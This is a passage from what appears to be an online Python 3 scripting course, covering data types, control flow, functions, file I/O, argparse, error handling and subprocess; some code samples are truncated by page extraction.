sequence type. We create tuples using parenthesis (( and )) and at least one comma (,): >>> point = (2.0, 3.0) Since tuples are immutable, we don’t have access to the same methods that we do on a list. We can use tuples in some operations like concatenation, but we can’t change the original tuple that we created. >>> point_3d = point + (4.0,) >>> point_3d (2.0, 3.0, 4.0) One interesting characterist of tuples is that we can unpack them into multiple variables at the same time: >>> x, y, z = point_3d >>> x 2.0 >>> y 3.0 >>> z 4.0 The time you’re most likely to see tuples will be when looking at a format string that’s compatible with Python 2: >>> print("My name is: %s %s" % ("Keith", "Thompson")) Dictionaries (dicts) 00:10:17 Lesson Description: Learn how to use dictionaries (the dict type) to hold onto key/value information in Python. Python Documentation For This Video Dictionaries Dictionaries Dictionaries are the main mapping type that we’ll use in Python. This object is comparable to a Hash or “associative array” in other languages. Things to note about dictionaries: Unlike Python 2 dictionaries, as of Python 3.6, keys are ordered in dictionaries. You'll need OrderedDict if you want this to work on another version of Python. You can set the key to any IMMUTABLE TYPE (no lists). Avoid using things other than simple objects as keys. Each key can only have one value (so don’t have duplicates when creating a dict). We create dictionary literals by using curly braces ({ and }), separating keys from values using colons (:), and separating key/value pairs using commas (,). Here’s an example dictionary: >>> ages = { 'kevin': 59, 'alex': 29, 'bob': 40 } >>> ages {'kevin': 59, 'alex': 29, 'bob': 40} We can read a value from a dictionary by subscripting using the key: >>> ages['kevin'] 59 >>> ages['billy'] Traceback (most recent call last): File "", line 1, in KeyError: 'billy' Keys can be added or changed using subscripting and assignment: >>> ages['kayla'] = 21 >>> ages {'kevin': 59, 'alex': 29, 'bob': 40, 'kayla': 21} Items can be removed from a dictionary using the del statement or by using the pop method: >>> del ages['kevin'] >>> ages {'alex': 29, 'bob': 40, 'kayla': 21} >>> del ages >>> ages Traceback (most recent call last): File "", line 1, in NameError: name 'ages' is not defined >>> ages = { 'kevin': 59, 'alex': 29, 'bob': 40 } >>> ages.pop('alex') 29 >>> ages {'kevin': 59, 'bob': 40} It’s not uncommon to want to know what keys or values we have without caring about the pairings. For that situation we have the values and keys methods: >>> ages = {'kevin': 59, 'bob': 40} >>> ages.keys() dict_keys(['kevin', 'bob']) >>> list(ages.keys()) ['kevin', 'bob'] >>> ages.values() dict_values([59, 40]) >>> list(ages.values()) [59, 40] Alternative Ways to Create a dict Using Keyword Arguments There are a few other ways to create dictionaries that we might see, those being those that use the dict constructor with key/value arguments and a list of tuples: >>> weights = dict(kevin=160, bob=240, kayla=135) >>> weights {'kevin': 160, 'bob': 240, 'kayla': 135} >>> colors = dict([('kevin', 'blue'), ('bob', 'green'), ('kayla', 'red')]) >>> colors {'kevin': 'blue', 'bob': 'green', 'kayla': 'red'} Control Flow Conditionals and Comparisons 00:12:52 Lesson Description: Scripts become most interesting when they do the right thing based on the inputs that we provide. To start building robust scripts, we need to understand how to make comparisons and use conditionals. Python Documentation For This Video Comparisons if/elif/else Comparisons There are some standard comparison operators that we’ll use that match pretty closely to those used in mathematical equations. Let’s take a look at them: >>> 1 < 2 True >>> 0 > 2 False >>> 2 == 1 False >>> 2 != 1 True >>> 3.0 >= 3.0 True >>> 3.1 >> 3.1 >> 3 >> 1.1 == "1.1" False >>> 1.1 == float("1.1") True We can compare more than just numbers. Here’s what it looks like when we compare strings: >>> "this" == "this" True >>> "this" == "This" False >>> "b" > "a" True >>> "abc" < "b" True Notice that the string 'b' is considered greater than the strings 'a' and 'abc'. The characters are compared one at a time alphabetically to determine which is greater. This concept is used to sort strings alphabetically. The in Check We often get lists of information that we need to ensure contains (or doesn’t contain) a specific item. To make this check in Python, we’ll use the in and not in operations. >>> 2 in [1, 2, 3] True >>> 4 in [1, 2, 3] False >>> 2 not in [1, 2, 3] False >>> 4 not in [1, 2, 3] True if/elif/else With a grasp on comparisons, we can now look at how we can run different pieces of logic based on the values that we’re working with using conditionals. The keywords for conditionals in Python are if, elif, and else. Conditionals are the first language feature that we’re using that requires us to utilize whitespace to separate our code blocks. We will always use indentation of 4 spaces. The basic shape of an if statement is this: if CONDITION: pass The CONDITION portion can be anything that evaluates to True or False, and if the value isn’t explicitly a boolean, then it will be converted to determine how to carry out proceed past the conditional (basically using the bool constructor). >>> if True: ... print("Was True") ... Was True >>> if False: ... print("Was True") ... >>> To add an alternative code path, we’ll use the else keyword, followed by a colon (:), and indenting the code underneath: >>> if False: ... print("Was True") ... else: ... print("Was False") ... Was False In the even that we want to check multiple potential conditions we can use the elif CONDITION: statement. Here’s a more robust example: >>>>> if len(name) >= 6: ... print("name is long") ... elif len(name) == 5: ... print("name is 5 characters") ... elif len(name) >= 4: ... print("name is 4 or more") ... else: ... print("name is short") ... name is 5 characters Notice that we fell into the first elif statement’s block and then the second elif block was never executed even though it was true. We can only exercise one branch in an if statement. The 'while' Loop 00:09:21 Lesson Description: It’s incredibly common to need to repeat something a set number of times or to iterate over content. Here is where looping and iteration come into play. Python Documentation For This Video while statement for statement The while Loop The most basic type of loop that we have at our disposal is the while loop. This type of loop repeats itself based on a condition that we pass to it. Here’s the general structure of a while loop: while CONDITION: pass The CONDITION in this statement works the same way that it does for an if statement. When we demonstrated the if statement, we first tried it by simply passing in True as the condition. Let’s see when we try that same condition with a while loop: >>> while True: ... print("looping") ... looping looping looping looping That loop will continue forever, we’ve created an infinite loop. To stop the loop, press Ctrl-C. Infinite loops are one of the potential problems with while loops if we don’t use a condition that we can change from within the loop then it will continue forever if initially true. Here’s how we’ll normally approach using a while loop where we modify something about the condition on each iteration: >>> count = 1 >>> while count >> We can use other loops or conditions inside of our loops; we need only remember to indent four more spaces for each context. If in a nested context, we want to continue to the next iteration or stop the loop entirely. We also have access to the continue and break keywords: >>> count = 0 >>> while count < 10: ... if count % 2 == 0: ... count += 1 ... continue ... print(f"We're counting odd numbers: {count}") ... count += 1 ... We're counting odd numbers: 1 We're counting odd numbers: 3 We're counting odd numbers: 5 We're counting odd numbers: 7 We're counting odd numbers: 9 >>> In that example, we also show off how to “string interpolation” in Python 3 by prefixing a string literal with an f and then using curly braces to substitute in variables or expressions (in this case the count value). Here’s an example using the break statement: >>> count = 1 >>> while count < 10: ... if count % 2 == 0: ... break ... print(f"We're counting odd numbers: {count}") ... count += 1 ... We're counting odd numbers: 1 The 'for' Loop 00:10:53 Lesson Description: It’s incredibly common to need to repeat something a set number of times or to iterate over content. Here is where looping and iteration come into play. Python Documentation For This Video for statement The for Loop The most common use we have for looping is when we want to execute some code for each item in a sequence. For this type of looping or iteration, we’ll use the for loop. The general structure for a for loop is: for TEMP_VAR in SEQUENCE: pass The TEMP_VAR will be populated with each item as we iterate through the SEQUENCE and it will be available to us in the context of the loop. After the loop finishes one iteration, then the TEMP_VAR will be populated with the next item in the SEQUENCE, and the loop’s body will execute again. This process continues until we either hit a break statement or we’ve iterated over every item in the SEQUENCE. Here’s an example looping over a list of colors: >>> colors = ['blue', 'green', 'red', 'purple'] >>> for color in colors: ... print(color) ... blue green red purple >>> color 'purple' If we didn't want to print out certain colors we could utilize the continue or break statements again. Let’s say we want to skip the string 'blue' and terminate the loop if we see the string 'red': >>> colors = ['blue', 'green', 'red', 'purple'] >>> for color in colors: ... if color == 'blue': ... continue ... elif color == 'red': ... break ... print(color) ... green >>> Other Iterable Types Lists will be the most common type that we iterate over using a for loop, but we can also iterate over other sequence types. Of the types we already know, we can iterate over strings, dictionaries, and tuples. Here’s a tuple example: >>> point = (2.1, 3.2, 7.6) >>> for value in point: ... print(value) ... 2.1 3.2 7.6 >>> A dictionary example: >>> ages = {'kevin': 59, 'bob': 40, 'kayla': 21} >>> for key in ages: ... print(key) ... kevin bob kayla A string example: >>> for letter in "my_string": ... print(letter) ... m y _ s t r i n g >>> Unpacking Multiple Items in a for Loop We discussed in the tuples video how you can separate a tuple into multiple variables by “unpacking” the values. Unpacking works in the context of a loop definition, and you’ll need to know this to most effectively iterate over dictionaries because you’ll usually want the key and the value. Let’s iterate of a list of “points” to test this out: >>> list_of_points = [(1, 2), (2, 3), (3, 4)] >>> for x, y in list_of_points: ... print(f"x: {x}, y: {y}") ... x: 1, y: 2 x: 2, y: 3 x: 3, y: 4 Seeing how this unpacking works, let’s use the items method on our ages dictionary to list out the names and ages: >>> for name, age in ages.items(): ... print(f"Person Named: {name}") ... print(f"Age of: {age}") ... Person Named: kevin Age of: 59 Person Named: bob Age of: 40 Person Named: kayla Age of: 21 Logic Operations 00:10:39 Lesson Description: Up to this point, we’ve learned how to make simple comparisons, and now it’s time to make compound comparisons using logic/boolean operators. Python Documentation For This Video Boolean Operators The not Operation Sometimes we want to know the opposite boolean value for something. This might not sound intuitive, but sometimes we want to execute an if statement when a value is False, but that’s not how the if statement works. Here’s an example of how we can use not to make this work: >>>>> not name True >>> if not name: ... print("No name given") ... >>> We know that an empty string is a “falsy” value, so not "" will always return True. not will return the opposite boolean value for whatever it’s operating on. The or Operation Occasionally, we want to carry out a branch in our logic if one condition OR the other condition is True. Here is where we’ll use the or operation. Let’s see or in action with an if statement: >>>>>>> if first or last: ... print("The user has a first or last name") ... The user has a first or last name >>> If both first and last were “falsy” then the print would never happen: >>>>>>> if first or last: ... print("The user has a first or last name") ... >>> Another feature of or that we should know is that we can use it to set default values for variables: >>>>> last_name = last or "Doe" >>> last_name 'Doe' >>> The or operation will return the first value that is “truthy” or the last value in the chain: >>> 0 or 1 1 >>> 1 or 2 1 The and Operation The opposite of or is the and operation, which requires both conditions to be True. Continuing with our first and last name example, let’s conditionally print based on what we know: >>>>>>> if first and last: ... print(f"Full name: {first} {last}") ... elif first: ... print(f"First name: {first}") ... elif last: ... print(f"Last name: {last}") ... First name: Keith >>> Now let’s try the same thing with both first and last: >>>>>>> if first and last: ... print(f"Full name: {first} {last}") ... elif first: ... print(f"First name: {first}") ... elif last: ... print(f"Last name: {last}") ... Full name: Keith Thompson >>> The and operation will return the first value that is “falsy” or the last value in the chain: >>> 0 and 1 0 >>> 1 and 2 2 >>> (1 == 1) and print("Something") Something >>> (1 == 2) and print("Something") False Exercise: Creating and Displaying Variables 00:30:00 Exercise: Working with If/Else 00:30:00 Exercise: Iterating Over Lists 00:30:00 Python Basics Scripting with Python 3 Basic Scripting Reading User Input 00:06:57 Lesson Description: Our scripts become most powerful when they can take in inputs and don’t just do the same thing every time. Let’s learn how to prompt the user for input. Python Documentation For This Video The input function Accepting User Input Using input We’re going to build a script that requests three pieces of information from the user after the script runs. Let’s collect this data: name - The user’s name as a string birthdate - The user’s birthdate as a string age - The user’s age as an integer (we’ll need to convert it) ~/bin/age #!/usr/bin/env python3.6 name = input("What is your name? ") birthdate = input("What is your birthdate? ") age = int(input("How old are you? ")) print(f"{name} was born on {birthdate}") print(f"Half of your age is {age / 2}") Function Basics 00:06:39 Lesson Description: Being able to write code that we can call multiple times without repeating ourselves is one of the most powerful things that we can do. Let’s learn how to define functions in Python. Python Documentation For This Video Defining Functions Function Basics We can create functions in Python using the following: The def keyword The function name - lowercase starting with a letter or underscore (_) Left parenthesis (() 0 or more argument names Right parenthesis ()) A colon : An indented function body Here’s an example without an argument: >>> def hello_world(): ... print("Hello, World!") ... >>> hello_world() Hello, World! >>> If we want to define an argument we will put the variable name we want it to have within the parentheses: >>> def print_name(name): ... print(f"Name is {name}") ... >>> print_name("Keith") Name is Keith Let’s try to assign the value from print_name to a variable: >>> output = print_name("Keith") Name is Keith >>> output >>> Neither of these examples has a return value, but we will usually want to have a return value unless the function is our “main” function or carries out a “side-effect” like printing. If we don’t explicitly declare a return value, then the result will be None. We can declare what we’re returning from a function using the return keyword: >>> def add_two(num): ... return num + 2 ... >>> result = add_two(2) >>> result 4 Using Functions in Scripts 00:16:33 Lesson Description: Now that we’ve looked into the structure of functions, let’s utilize them in a script. Python Documentation For This Video Defining Functions Encapsulating Behavior with Functions To dig into functions, we’re going to write a script that prompts the user for some information and calculates the user’s Body Mass Index (BMI). That isn’t a common problem, but it’s something that makes sense as a function and doesn’t require us to use language features that we haven’t learned yet. Here’s the formula for BMI: BMI = (weight in kg / height in meters squared ) For Imperial systems, it’s the same formula except you multiply the result by 703. We want to prompt the user for their information, gather the results, and make the calculations if we can. If we can’t understand the measurement system, then we need to prompt the user again after explaining the error. Gathering Info Since we want to be able to prompt a user multiple times we’re going to package up our calls to input within a single function that returns a tuple with the user given information: def gather_info(): height = float(input("What is your height? (inches or meters) ")) weight = float(input("What is your weight? (pounds or kilograms) ")) system = input("Are your measurements in metric or imperial units? ").lower().strip() return (height, weight, system) We’re converting the height and weight into float values, and we’re okay with a potential error if the user inputs an invalid number. For the system, we’re going to standardize things by calling lower to lowercase the input and then calling strip to remove the whitespace from the beginning and the end. The most important thing about this function is the return statement that we added to ensure that we can pass the height, weight, and system back to the caller of the function. Calculating and Printing the BMI Once we’ve gathered the information, we need to use that information to calculate the BMI. Let’s write a function that can do this: def calculate_bmi(weight, height, system='metric'): """ Return the Body Mass Index (BMI) for the given weight, height, and measurement system. """ if system == 'metric': bmi = (weight / (height ** 2)) else: bmi = 703 * (weight / (height ** 2)) return bmi This function will return the calculated value, and we can decide what to do with it in the normal flow of our script. The triple-quoted string we used at the top of our function is known as a “documentation string” or “doc string” and can be used to automatically generated documentation for our code using tools in the Python ecosystem. Setting Up The Script’s Flow Our functions don’t do us any good if we don’t call them. Now it’s time for us to set up our scripts flow. We want to be able to re-prompt the user, so we want to utilize an intentional infinite loop that we can break out of. Depending on the system, we’ll determine how we should calculate the BMI or prompt the user again. Here’s our flow:.") Full Script Once we’ve written our script, we’ll need to make it executable (using chmod u+x ~/bin/bmi). ~/bin/bmi #!/usr/bin/env python3.6 def gather_info(): height = float(input("What is your height? (inches or meters) ")) weight = float(input("What is your weight? (pounds or kilograms) ")) system = input("Are your mearsurements in metric or imperial systems? ").lower().strip() return (height, weight, system) def calculate_bmi(weight, height, system='metric'): if system == 'metric': bmi = (weight / (height ** 2)) else: bmi = 703 * (weight / (height ** 2)) return bmi.") Using Standard Library Packages 00:12:39 Lesson Description: One of the best reasons to use Python for scripting is that it comes with a lot of useful packages in the standard library. Python Documentation For This Video Python Library Reference The time package Utilizing Packages Up to this point, we’ve only used functions and types that are always globally available, but there are a lot of functions that we can use if we import them from the standard library. Importing packages can be done in a few different ways, but the simplest is using the import statement. Here’s how we can import the time package for use: >>> import time >>> Importing the package allows us to access functions and classes that it defines. We can do that by chaining off of the package name. Let’s call the localtime function provided by the time package: >>> now = time.localtime() >>> now time.struct_time(tm_year=2018, tm_mon=1, tm_mday=26, tm_hour=15, tm_min=32, tm_sec=43, tm_wday=4, tm_yday=26, tm_isdst=0) Calling this function returns a time.struct_time to use that has some attributes that we can interact with using a period (.): >>> now.tm_hour 15 Here is our first time interaction with an attribute on an object that isn’t a function. Sometimes we need to access the data from an object, and for that, we don’t need to use parentheses. Building a Stopwatch Script To put our knowledge of the standard library to use, we’re going to read through the time package’s documentation and utilize some of its functions and types to build a stopwatch. We’ll be using the following functions: localtime - gives us the time_struct for the current moment strftime - allows us to specify how to represent the time_struct as a string. mktime - converts a time_struct into a numeric value so we can calculate the time difference. ~/bin/timer #!/usr/bin/env python3.6 import time start_time = time.localtime() print(f"Timer started at {time.strftime('%X', start_time)}") # Wait for user to stop timer input("Press any key to stop timer ") stop_time = time.localtime() difference = time.mktime(stop_time) - time.mktime(start_time) print(f"Timer stopped at {time.strftime('%X', stop_time)}") print(f"Total time: {difference} seconds") Importing Specifics From a Module We’re only using a subset of the functions from the time package, and it’s a good practice to only import what we need. We can import a subset of a module using the from statement combined with our import. The usage will look like this: from MODULE import FUNC1, FUNC2, etc... Let’s convert our script over to only import the functions that we need using the from statement: ~/bin/timer #!/usr/bin/env python3.6 from time import localtime, mktime, strftime start_time = localtime() print(f"Timer started at {strftime('%X', start_time)}") # Wait for user to stop timer input("Press any key to stop timer ") stop_time = localtime() difference = mktime(stop_time) - mktime(start_time) print(f"Timer stopped at {strftime('%X', stop_time)}") print(f"Total time: {difference} seconds") Working with Environment Variables 00:06:12 Lesson Description: A common way to configure a script or CLI is to use environment variables. Let’s learn how we can access environment variables from inside of our Python scripts. Python Documentation For This Video The os package The os.environ attribute The os.getenv function Working with Environment Variables By importing the os package, we’re able to access a lot of miscellaneous operating system level attributes and functions, not the least of which is the environ object. This object behaves like a dictionary, so we can use the subscript operation to read from it. Let’s create a simple script that will read a 'STAGE' environment variable and print out what stage we’re currently running in: ~/bin/running #!/usr/bin/env python3.6 import os stage = os.environ["STAGE"].upper() output = f"We're running in {stage}" if stage.startswith("PROD"): output = "DANGER!!! - " + output print(output) We can set the environment variable when we run the script to test the differences: $ STAGE=staging running We're running in STAGING $ STAGE=production running DANGER!!! - We're running in PRODUCTION What happens if the 'STAGE' environment variable isn’t set though? $ running Traceback (most recent call last): File "/home/user/bin/running", line 5, in stage = os.environ["STAGE"].upper() File "/usr/local/lib/python3.6/os.py", line 669, in __getitem__ raise KeyError(key) from None KeyError: 'STAGE' This potential KeyError is the biggest downfall of using os.environ, and the reason that we will usually use os.getenv. Handling A Missing Environment Variable If the 'STAGE' environment variable isn’t set, then we want to default to 'DEV', and we can do that by using the os.getenv function: ~/bin/running #!/usr/bin/env python3.6 import os stage = os.getenv("STAGE", "dev").upper() output = f"We're running in {stage}" if stage.startswith("PROD"): output = "DANGER!!! - " + output print(output) Now if we run our script without a 'STAGE' we won’t have an error: $ running We're running in DEV Interacting with Files 00:19:35 Lesson Description: Let’s learn how to interact with files in Python. Python Documentation For This Video The open function The file-object The io module Interacting with Files It’s pretty common to need to read the contents of a file in a script and Python makes that pretty easy for us. Before we get started, let’s create a text file that we can read from called xmen_base.txt: ~/xmen_base.txt Storm Wolverine Cyclops Bishop Nightcrawler Now that we have a file to work with, let’s experiment from the REPL before writing scripts that utilize files. Opening and Reading a File Before we can read a file, we need to open a connection to the file. Let’s open the xmen_base.txt file to see what a file object can do: >>> xmen_file = open('xmen_base.txt', 'r') >>> xmen_file The open function allows us to connect to our file by specifying the path and the mode. We can see that our xmen_file object is an _io.TextIOWrapper so we can look at the documentation to see what we can do with that type of object. There is a read function so let’s try to use that: >>> xmen_file.read() 'StormnWolverinenCyclopsnBishopnNightcrawlern' >>> xmen_file.read() '' read gives us all of the content as a single string, but notice that it gave us an empty string when we called the function as second time. That happens because the file maintains a cursor position and when we first called read the cursor was moved to the very end of the file’s contents. If we want to reread the file we’ll need to move the beginning of the file using the seek function like so: >>> xmen_file.seek(0) 0 >>> xmen_file.read() 'StormnWolverinenCyclopsnBishopnNightcrawlern' >>> xmen_file.seek(6) 6 >>> xmen_file.read() 'WolverinenCyclopsnBishopnNightcrawlern' By seeking to a specific point of the file, we are able to get a string that only contains what is after our cursor’s location. Another way that we can read through content is by using a for loop: >>> xmen_file.seek(0) 0 >>> for line in xmen_file: ... print(line, end="") ... Storm Wolverine Cyclops Bishop Nightcrawler >>> Notice that we added a custom end to our printing because we knew that there were already newline characters (n) in each line. Once we’re finished working with a file, it is import that we close our connection to the file using the close function: >>> xmen_file.close() >>> xmen_file.read() Traceback (most recent call last): File "", line 1, in ValueError: I/O operation on closed file. >>> Creating a New File and Writing to It We now know the basics of reading a file, but we’re also going to need to know how to write content to files. Let’s create a copy of our xmen file that we can add additional content to: >>> xmen_base = open('xmen_base.txt') >>> new_xmen = open('new_xmen.txt', 'w') We have to reopen our previous connection to the xmen_base.txt so that we can read it again. We then create a connection to a file that doesn't exist yet and set the mode to w, which stands for “write”. The opposite of the read function is the write function, and we can use both of those to populate our new file: >>> new_xmen.write(xmen_base.read()) >>> new_xmen.close() >>> new_xmen = open(new_xmen.name, 'r+') >>> new_xmen.read() 'StormnWolverinenCyclopsnBishopnNightcrawlern' We did quite a bit there, let’s break that down: We read from the base file and used the return value as the argument to write for our new file. We closed the new file. We reopened the new file, using the r+ mode which will allow us to read and write content to the file. We read the content from the new file to ensure that it wrote properly. Now that we have a file that we can read and write from let’s add some more names: >>> new_xmen.seek(0) >>> new_xmen.write("Beastn") 6 >>> new_xmen.write("Phoenixn") 8 >>> new_xmen.seek(0) 0 >>> new_xmen.read() 'BeastnPhoenixnenCyclopsnBishopnNightcrawlern' What happened there? Since we are using the r+ we are overwriting the file on a per character basis since we used seek to go back to the beginning of the file. If we reopen the file in the w mode, the pre-existing contents will be truncated. Appending to a File A fairly common thing to want to do is to append to a file without reading its current contents. This can be done with the a mode. Let’s close the xmen_base.txt file and reopen it in the a mode to add another name without worrying about losing our original content. This time, we’re going to use the with statement to temporarily open the file and have it automatically closed after our code block has executed: >>> xmen_file.close() >>> with open('xmen_base.txt', 'a') as f: ... f.write('Professor Xaviern') ... 17 >>> f = open('xmen_base.txt', 'a') >>> with f: ... f.write("Somethingn") ... 10 >>> exit() To test what we just did, let’s cat out the contents of this file: $ cat xmen_base.txt Storm Wolverine Cyclops Bishop Nightcrawler Professor Xavier Something Intermediate Scripting Parsing Command Line Parameters 00:05:39 Lesson Description: Many times scripts are more useful if we can pass in arguments when we type the command rather than having a second step to get user input. Python Documentation For This Video The sys module The sys.argv attribute Accepting Simple Positional Arguments Most of the scripts and utilities that we work with accept positional arguments instead of prompting us for information after we’ve run the command. The simplest way for us to do this in Python is to use the sys module’s argv attribute. Let’s try this out by writing a small script that echoes our first argument back to us: ~/bin/param_echo #!/usr/bin/env python3.6 import sys print(f"First argument {sys.argv[0]}") After we make this executable and give it a shot, we see that the first argument is the script itself: $ chmod u+x ~/bin/param_echo $ param_echo testing First argument /home/user/bin/param_echo That’s not quite what we wanted, but now we know that argv will contain the script and we’ll need to get the index of 1 for our first argument. Let’s adjust our script to echo all of the arguments except the script name and then echo the first positional argument by itself: ~/bin/param_echo #!/usr/bin/env python3.6 import sys print(f"Positional arguments: {sys.argv[1:]}") print(f"First argument: {sys.argv[1]}") Trying the same command again, we get a much different result: $ param_echo testing Positional arguments: ['testing'] First argument: testing $ param_echo testing testing12 'another argument' Positional arguments: ['testing', 'testing12', 'another argument'] First argument: testing $ param_echo Positional arguments: [] Traceback (most recent call last): File "/home/user/bin/param_echo", line 6, in print(f"First argument: {sys.argv[1]}") IndexError: list index out of range This shows us a few things about working with argv: Positional arguments are based on spaces unless we explicitly wrap the argument in quotes. We can get a slice of the first index and after without worrying about it being empty. We risk an IndexError if we assume that there will be an argument for a specific position and one isn’t given. Using sys.argv is the simplest way to allow our scripts to accept positional arguments. In the next video, we’ll explore a standard library package that will allow us to provide a more robust command line experience with help text, named arguments, and flags. Robust CLIs with 'argparse' - Part 1 00:13:56 Lesson Description: We can build simple scripts with positional arguments using sys.argv, but when we want to provide a better command-line user experience, we should use something that can provide contextual information and documentation. Let’s learn how to use the argparse module to do just that. Python Documentation For This Video The argparse module The argparse.ArgumentParser class Building a CLI to Reverse Files The tool that we’re going to build in this video will need to do the following: Require a filename argument, so it knows what file to read. Print the contents of the file backward (bottom of the script first, each line printed backward) Provide help text and documentation when it receives the --help flag. Accept an optional --limit or -l flag to specify how many lines to read from the file. Accept a --version flag to print out the current version of the tool. This sounds like quite a bit, but thankfully the argparse module will make doing most of this trivial. We’ll build this script up gradually as we learn what the argparse.ArgumentParser can do. Let’s start by building an ArgumentParser with our required argument: ~/bin/reverse-file #!/usr/bin/env python3.6 import argparse parser = argparse.ArgumentParser() parser.add_argument('filename', help='the file to read') args = parser.parse_args() print(args) Here we've created an instance of ArgumentParser without any arguments. Next, we'll use the add_argument method to specify a positional argument called filename and provide some help text using the help argument. Finally, we tell the parser to parse the arguments from stdin using the parse_args method and stored off the parsed arguments as the variable args. Let’s make our script executable and try this out without any arguments: $ chmod u+x ~/bin/reverse-file $ reverse-file usage: reverse-file [-h] filename reverse-file: error: the following arguments are required: filename Since filename is required and wasn’t given the ArgumentParser object recognized the problem and returned a useful error message. That’s awesome! We can also see that it looks like it takes the -h flag already, let’s try that now: $ reverse-file -h usage: reverse-file [-h] filename positional arguments: filename the file to read optional arguments: -h, --help show this help message and exit It looks like we’ve already handled our requirement to provide help text. The last thing we need to test out is what happens when we do provide a parameter for filename: $ reverse-file testing.txt Namespace(filename='testing.txt') We can see here that args in our script is a Namespace object. This is a simple type of object that’s sole purpose is to hold onto named pieces of information from our ArgumentParser as attributes. The only attribute that we've asked it to hold onto is the filename attribute, and we can see that it set the value to 'testing.txt' since that’s what we passed in. To access these values in our code, we will chain off of our args object with a period: >>> args.filename 'testing.txt' Adding Optional parameters We’ve already handled two of the five requirements we set for this script; let’s continue by adding the optional flags to our parser and then we’ll finish by implementing the real script logic. We need to add a --limit flag with a -l alias. ~/bin/reverse-file #!/usr/bin/env python3.6 import argparse parser = argparse.ArgumentParser(description='Read a file in reverse') parser.add_argument('filename', help='the file to read') parser.add_argument('--limit', '-l', type=int, help='the number of lines to read') args = parser.parse_args() print(args) To specify that an argument is a flag, we need to place two hyphens at the beginning of the flag’s name. We’ve used the type option for add_argument to state that we want the value converted to an integer, and we specified a shorter version of the flag as our second argument. Here is what args now looks like: $ reverse-file --limit 5 testing.txt Namespace(filename='testing.txt', limit=5) Next, we’ll add a --version flag. This one will be a little different because we’re going to use the action option to specify a string to print out when this flag is received: ~() print(args) This uses a built-in action type of version which we’ve found in the documentation. Here’s what we get when we test out the --version flag: $ reverse-file --version reverse-file 1.0 Note: Notice that it carried out the version action and didn’t continue going through the script. Robust CLIs with 'argparse' - Part 2 00:07:08 Lesson Description: We’ve implemented the CLI parser for our reverse-file script, and now it’s time to utilize the arguments that were parsed to reverse the given file’s content. Python Documentation For This Video The argparse module The argparse.ArgumentParser class Adding Our Business Logic We finally get a chance to use our file IO knowledge in a script: ~() with open(args.filename) as f: lines = f.readlines() lines.reverse() if args.limit: lines = lines[:args.limit] for line in lines: print(line.strip()[::-1]) Here’s what we get when we test this out on the xmen_base.txt file from our working with files video: $ reverse-file xmen_base.txt gnihtemoS reivaX rosseforP relwarcthgiN pohsiB spolcyC enirevloW mrotS ~ $ reverse-file -l 2 xmen_base.txt gnihtemoS reivaX rosseforP Handling Errors with try/except/else/finally 00:09:13 Lesson Description: We’ve run into a few situations already where we could run into errors, particularly when working with user input. Let’s learn how to handle these errors gracefully to write the best possible scripts. Python Documentation For This Video The try statement & workflow Handling Errors with try/except/else/finally In our reverse-file script, what happens if the filename doesn’t exist? Let’s give it a shot: $ reverse-file fake.txt Traceback (most recent call last): File "/home/user/bin/reverse-file", line 11, in with open(args.filename) as f: FileNotFoundError: [Errno 2] No such file or directory: 'fake.txt' This FileNotFoundError is something that we can expect to happen quite often and our script should handle this situation. Our parser isn’t going to catch this because we’re technically using the CLI properly, so we need to handle this ourselves. To handle these errors we’re going to utilize the keywords try, except, and else. ~}") else: with f: lines = f.readlines() lines.reverse() if limit: lines = lines[:limit] for line in lines: print(line.strip()[::-1]) We utilize the try statement to denote that it’s quite possible for an error to happen within it. From there we can handle specific types of errors using the except keyword (we can have more than one). In the event that there isn’t an error, then we want to carry out the code that is in the else block. If we want to execute some code regardless of there being an error or not, we can put that in a finally block at the very end of our t, except for workflow. Now when we try our script with a fake file, we get a much better response: $ reverse-file fake.txt Error: [Errno 2] No such file or directory: 'fake.txt' Exit Statuses 00:03:11 Lesson Description: When we’re writing scripts, we’ll want to be able to set exit statuses if something goes wrong. For that, we’ll be using the sys module. Python Documentation For This Video The sys module The sys.exit function Adding Error Exit Status to reverse-file When our reverse-file script receives a file that doesn’t exist, we show an error message, but we don’t set the exit status to 1 to be indicative of an error. $ reverse-file -l 2 fake.txt Error: [Errno 2] No such file or directory: 'fake.txt' ~ $ echo $? 0 Let’s use the sys.exit function to accomplish this: ~/bin/reverse-file #!/usr/bin/env python3.6 import argparse import sys}") sys.exit(1) else: with f: lines = f.readlines() lines.reverse() if limit: lines = lines[:limit] for line in lines: print(line.strip()[::-1]) Now, if we try our script with a missing file, we will exit with the proper code: $ reverse-file -l 2 fake.txt Error: [Errno 2] No such file or directory: 'fake.txt' $ echo $? 1 Execute Shell Commands from Python 00:12:47 Lesson Description: Sometimes when we’re scripting, we need to call a separate shell command. Not every tool is written in python, but we can still interact with the userland API of other tools. Python Documentation For This Video The subprocess module The subprocess.run function The subprocess.CompletedProcess class The subprocess.PIPE object The bytes type The subprocess.CalledProcessError class Executing Shell Commands With subprocess.run For working with external processes, we’re going to experiment with the subprocess module from the REPL. The main function that we’re going to work with is the subprocess.run function, and it provides us with a lot of flexibility: >>> import subprocess >>> proc = subprocess.run(['ls', '-l']) >>> proc CompletedProcess(args=['ls', '-l'], returncode=0) Our proc variable is a CompletedProcess object, and this provides us with a lot of flexibility. We have access to the returncode attribute on our proc variable to ensure that it succeeded and returned a 0 to us. Notice that the ls command was executed and printed to the screen without us specifying to print anything. We can get around this by capturing STDOUT using a subprocess.PIPE. >>> proc = subprocess.run( ... ['ls', '-l'], ... stdout=subprocess.PIPE, ... stderr=subprocess.PIPE, ... ) >>> proc CompletedProcess(args=['ls', '-l'], returncode=0,', stderr=b'') >>>' Now that we’ve captured the output to attributes on our proc variable, we can work with it from within our script and determine whether or not it should ever be printed. Take a look at this string that is prefixed with a b character. It is because it is a bytes object and not a string. The bytes type can only contain ASCII characters and won’t do anything special with escape sequences when printed. If we want to utilize this value as a string, we need to explicitly convert it using the bytes.decode method. >>> print' >>> print(proc.stdout.decode()) >>> Intentionally Raising Errors The subprocess.run function will not raise an error by default if you execute something that returns a non-zero exit status. Here’s an example of this: >>> new_proc = subprocess.run(['cat', 'fake.txt']) cat: fake.txt: No such file or directory >>> new_proc CompletedProcess(args=['cat', 'fake.txt'], returncode=1) In this situation, we might want to raise an error, and if we pass the check argument to the function, it will raise a subprocess.CalledProcessError if something goes wrong: >>> error_proc = subprocess.run(['cat', 'fake.txt'], check=True) cat: fake.txt: No such file or directory Traceback (most recent call last): File "", line 1, in File "/usr/local/lib/python3.6/subprocess.py", line 418, in run output=stdout, stderr=stderr) subprocess.CalledProcessError: Command '['cat', 'fake.txt']' returned non-zero exit status 1. >>> Python 2 Compatible 